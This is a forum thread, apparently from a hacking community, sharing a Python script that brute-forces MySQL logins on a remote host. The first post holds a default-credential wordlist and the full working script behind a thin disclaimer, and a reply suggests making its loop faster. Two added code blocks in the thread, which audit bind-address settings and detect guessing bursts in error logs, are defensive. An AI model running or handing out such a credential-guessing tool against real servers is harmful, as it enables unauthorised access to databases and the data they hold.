Thread: Crack the MySQL (Database) Username and Password Remotely.

  1. #1
    Garage Newcomer
    Join Date
    Feb 2012
    Location
    Delhi India
    Posts
    4
    Blog Entries
    1

    Crack the MySQL (Database) Username and Password Remotely.

    As per PCI compliance, if you want to accept credit cards or debit cards online, you must have MySQL remote connections disabled. If you don't, you will not be able to sell your product from your website. If you are wondering why they have such a rule, the tool below will show you what can happen if you don't follow the PCI rule.

    Apart from that, if you are a really security-minded person, then you should disable your MySQL remote connection immediately, at least for root. You can do that by editing your "mysql configuration file" (my.cnf).
    You need to add the line below to prevent MySQL remote connections.

    Code:
    bind-address = 127.0.0.1

    "my.cnf" files are most of the time available at "/etc/mysql/my.cnf" on Linux/Unix and in "C:\mysql" or the MySQL installation directory.

    Enough reading, let's move on to the main point: how to crack a MySQL username and password remotely.

    I have created a repository here on GitHub: https://github.com/krokite/MySQL-Bruteforce-Tool

    System Requirements:
    • Operating System: Windows, Linux, Macintosh [ All ]
    • Software Required: Python & MySQL

    Software Requirement Description: Python is required to run the tool and MySQL is required to test the connection.

    Steps to run this script:
    1. Create a "credentiallist.txt" file in the pattern Username:Password
    2. Run the command below: python mysql_bruteforce.py
    3. Grab a coffee and relax now. When the username and password are cracked, it will print the result and exit.

    Below is a demo "credentiallist.txt" file:

    Code:
    username:password
    root:
    root:root
    root:toor
    admin:admin
    root:admin
    root:1
    root:12
    root:123
    root:1234
    root:12345
    root:123456
    root:1234567
    root:12345678
    root:123456789
    root:1234567890
    root:a
    root:ab
    root:abc
    root:abcd
    root:abcde
    root:abcdef
    root:abcdefghijklmnopqrstuvwxyz
    root:hacker
    root:password

    And below is your mysql_bruteforce.py file.

    Code:
    #!/usr/bin/python
    # Author : KroKite
    # Description: Basic Password Bruteforcing Tool.
    # URL: http://facebook.com/r0ckysharma

    import sys
    import subprocess
    import re

    print '''
            $$ \ $$\   $$$$$$$\  $$$$$$\   $$\   $$\ $$$$$$\ $$$$$$$$\ $$$$$$$$$|
            $$ | $$ |  $$ __$$ \ $$ __$$\  $$ | $$ | \_$$ _| \__$$ __| $$ ______|
            $$ |$$ /   $$ | $$ | $$ / $$ | $$ |$$ /    $$ |     $$ |   $$ |
            $$$$$ /    $$$$$$$ | $$ | $$ | $$$$$ /     $$ |     $$ |   $$$$$$|
            $$$ $$ \   $$ __$$ | $$ | $$ | $$ $$|      $$ |     $$ |   $$ ___|
            $$ |\$$\   $$ | $$ | $$ | $$ | $$ |\$$\    $$ |     $$ |   $$ |
            $$ | \$$\  $$ | $$ | $$$$$$ |  $$ | \$$\ $$$$$$\    $$ |   $$$$$$$$$|
            \__|  \__| \__| \__| \______/  \__| \__| \______|   \__|   \________|
            '''
    print "[+] Please Report any Bug to krokite@worldofhacker.com"
    print "[+] Greets to: c1ph3r(Krit Kadnok), Nocdem, MayaSeven, Xcode, webDEVIl, fb1h2s, Aseem Jakhar, Prashant Mahajan, and Other NullCon members, Sukesh Reddy, Sarmanjit Singh, Rakesh Kumar"
    print "[+] For Security Releated Discussions, Do Visit us at http://www.garage4hackers.com or http://forum.worldofhacker.com"
    print "[+] This Application helps you to crack mysql password with given list"
    print "[+] Usage: python mysql_bruteforce.py ip_or_hostname_here"
    print "\n"

    fo = open("credentiallist.txt", 'r');
    for lines in fo:
            password = lines.split('\n')
            creds = password[0].split(':')
            if(len(sys.argv) == 2):
                    command = "mysql -h {0} -u {1} -p{2} -e STATUS".format(sys.argv[1], creds[0], creds[1])
                    brute = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
                    if(re.search("Uptime", brute.communicate()[0])):
                            print "Password Cracked and your Username:Password is ", creds[0], ":", creds[1]
                            exit()
            else:
                    print "[+] Usage: \n\t[+] root@system# chmod u+x mysql_bruteforce.py\n\t[+] root@system# ./mysql_bruteforce.py ip_or_hostname_here"
                    exit()

    Good Luck!

    Note: Kindly note, this tool is for educational purposes only. Kindly do not misuse it; if you misuse this tool, I will not be responsible for anything.
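
A way to check the bind-address hardening described in the post above, as an added example that is not part of the original post or the linked repository: it audits the `[mysqld]` section of one option file and reports whether the server would accept TCP connections from other hosts. The function names and the sample file are constructed for illustration; it assumes a single option file and ignores `!include` directives.

```python
import ipaddress

# Constructed sample option file (not from the original post).
SAMPLE_CNF = """\
[client]
port = 3306
[mysqld]
bind_address = 0.0.0.0   # earlier line, overridden below
bind-address = 127.0.0.1
"""

def is_loopback(addr):
    """True for 'localhost' or a literal loopback IP; '*' and other hostnames are not."""
    if addr.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False

def audit_mysqld_exposure(cnf_text):
    """Return (exposed, reason) for the [mysqld] section of one option file."""
    section, bind, skip_net = None, None, False
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line[0] in ";!":              # comments and !include lines
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "mysqld":                      # [client] etc. do not affect the listener
            continue
        key, _, value = line.partition("=")
        key = key.strip().lower().replace("_", "-")  # '-' and '_' are interchangeable in names
        value = value.strip().strip("\"'")
        if key == "bind-address":
            bind = value                             # a later line overrides an earlier one
        elif key == "skip-networking":
            skip_net = value.lower() not in ("0", "off", "false")
    if skip_net:
        return (False, "skip-networking set: no TCP listener")
    if bind is None:                                 # server default is all interfaces
        return (True, "bind-address not set in this file")
    open_addrs = [a.strip() for a in bind.split(",") if not is_loopback(a.strip())]
    if open_addrs:
        return (True, "listens on non-loopback address(es): " + ", ".join(open_addrs))
    return (False, "bound to loopback only: " + bind)
```
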

  2. #2
    ... I am no Expert b0nd.g4h@gmail.com b0nd's Avatar
    Join Date
    Jul 2010
    Location
    irc.freenode.net #g4h
    Posts
    744
    Hey, good to begin with!

    A logical suggestion here.
    if(len(sys.argv) == 2):
    should be taken out of the loop and shall be the first thing to check. In your code, unnecessarily, this condition is getting checked every time a new cred/pass combo is selected. This would hamper the speed as well.

    Cheers!
    [*] To follow the path: look to the master, follow the master, walk with the master, see through the master,
    ------> become the master!!! <------
    [*] Everyone has a will to WIN but very few have the will to prepare to WIN
    [*] Invest yourself in everything you do, there's fun in being serious
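
How the credential-list loop discussed in this thread looks from the server side, as an added example that is not part of either post: each entry in the list is a separate failed login, so a burst of "Access denied" lines from one host in a short window is the signal to alert on. The log lines are constructed (documentation address ranges), the threshold and window are illustrative, and it assumes the server writes failed logins to its error log (`log_error_verbosity=3`).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

DENIED = re.compile(
    r"^(\S+) .*Access denied for user '([^']*)'@'([^']*)' \(using password: (YES|NO)\)")

# Constructed error-log lines: (minute, second, user, client host, password sent).
LINE_FMT = ("2024-05-01T10:{:02d}:{:02d}.000000Z 9 [Note] [MY-010926] [Server] "
            "Access denied for user '{}'@'{}' (using password: {})")
SAMPLE_LOG = "\n".join(LINE_FMT.format(*row) for row in [
    (0, 1, "root", "203.0.113.7", "NO"),      # an entry with an empty password
    (0, 2, "root", "203.0.113.7", "YES"),
    (0, 3, "root", "203.0.113.7", "YES"),
    (0, 4, "admin", "203.0.113.7", "YES"),
    (0, 5, "root", "203.0.113.7", "YES"),
    (0, 30, "app", "198.51.100.20", "YES"),   # an application with a stale password
    (5, 0, "app", "198.51.100.20", "YES"),
])

def find_guessing_sources(log_text, threshold=5, window_s=60):
    """Return {host: sorted users tried} for hosts with >= threshold failures in window_s."""
    recent = defaultdict(deque)   # host -> failure timestamps still inside the window
    users = defaultdict(set)      # host -> every account name it was denied for
    flagged = {}
    for line in log_text.splitlines():
        m = DENIED.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S.%fZ")
        user, host = m.group(2), m.group(3)
        q = recent[host]
        q.append(ts)
        users[host].add(user)
        while ts - q[0] > timedelta(seconds=window_s):
            q.popleft()           # drop failures that fell out of the sliding window
        if len(q) >= threshold:
            flagged[host] = sorted(users[host])
    return flagged
```
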
